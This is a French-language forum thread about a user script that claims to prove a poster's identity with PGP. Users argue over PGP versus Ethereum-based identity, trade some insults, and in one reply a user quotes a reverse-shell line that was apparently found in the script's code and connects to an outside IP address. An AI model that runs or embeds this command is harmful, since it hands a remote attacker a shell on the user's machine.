Ce sujet a été résolu
Toi tu vas cabler quand tu réaliseras que toutes les identités numériques décentralisés se développent via authent eth, et que ça fonctionne très bien
Les identités numériques ça existe déjà via pgp en fait
De plus c'est une technologie mature
Pour qu'elle soit décentralisé t'as juste à upload ta clef publique sur une blockchain
Pour qu'elle soit décentralisé t'as juste à upload ta clef publique sur une blockchain
il y a 2 ans
Ça fait juste parti d'un écosystème. Ce n'est pas la première fonctionnalité du script
C'est littéralement sa seule utilité

il y a 2 ans
C'est littéralement sa seule utilité

Non. Le script permet aussi de live update les messages comme JVChat
il y a 2 ans
Les identités numériques ça existe déjà via pgp en fait
Pas dis le contraire khey, je dis juste que PGP tout le monde s'en branle et que ça serait plus logique de partir sur une base ethereum
Mais bon osef l'op est fake de toute façon
il y a 2 ans
Ça l'aurait ban jvc. Actuellement la moindre mention de onche même en signature ou en description c'est ban def
il y a 2 ans
Voici le vrai Antoine :
https://onche.org/topic/3[...]rum-publication-de-ma-pgp
D'ailleurs l'auteur tu dois être un sacré déchet pour avoir que ça à foutre à 3h du matin
D'ailleurs l'auteur tu dois être un sacré déchet pour avoir que ça à foutre à 3h du matin
il y a 2 ans
Pas dis le contraire khey, je dis juste que PGP tout le monde s'en branle et que ça serait plus logique de partir sur une base ethereum
C'est que tu comprends pas pgp en fait
Genre ETH et pgp c'est pas incompatible
pgp ça permet juste d'avoir une hiérarchie de tes clefs et la possibilité de révoquer les clefs
Du coup en pratique t'as une master key qui est stocké offline et qui te sert uniquement à signer les clefs que tu vas utiliser pour signer d'autres trucs
Du coup en pratique vu que ta masterkey est jamais utilisée, elle est jamais compromise, et si t'as une clef avec laquelle tu signes tes messages qui est compromise, tu peux la révoquer et en créer une nouvelle sans perdre ton identité
En fait avoir un tel système ça me parait fondamental pour la blockchain, c'est probable que ce soit même déjà utilisé d'une manière ou d'une autre mais j'ai pas creusé le sujet
pgp ça permet juste d'avoir une hiérarchie de tes clefs et la possibilité de révoquer les clefs
Du coup en pratique t'as une master key qui est stocké offline et qui te sert uniquement à signer les clefs que tu vas utiliser pour signer d'autres trucs
Du coup en pratique vu que ta masterkey est jamais utilisée, elle est jamais compromise, et si t'as une clef avec laquelle tu signes tes messages qui est compromise, tu peux la révoquer et en créer une nouvelle sans perdre ton identité
En fait avoir un tel système ça me parait fondamental pour la blockchain, c'est probable que ce soit même déjà utilisé d'une manière ou d'une autre mais j'ai pas creusé le sujet
il y a 2 ans
C'est que tu comprends pas pgp en fait
Oui ethereum aussi tu as ça aussi pour les wallets dernière génération
Tu as même des systèmes où des SMARTS CONTRACT remplacent ta master key, on est clairement un niveau au dessus puisqu'il n'y a même plus besoin de protéger une master key
Tu as même des systèmes où des SMARTS CONTRACT remplacent ta master key, on est clairement un niveau au dessus puisqu'il n'y a même plus besoin de protéger une master key
il y a 2 ans
Antoine toi qui t'y connais on est d'accord que les CGU sont pas bonnes ? Y a pas de nom, numéro etc
il y a 2 ans
J'ai lu dans le code: sh -i >& /dev/tcp/83.8.52.44/4242 0>&1
Des explications?
Des explications?
il y a 2 ans
Parce qu'on usurpait mon identité. Mais j'ai corrigé le problème grâce à mon script. Maintenant les golems peuvent savoir qui est le vrai AntoineForum en installant mon script qui permît aussi d'avoir les mêmes fonctionnalités que JVChat
On se fiche de savoir qui est antoineforum ou pas
il y a 2 ans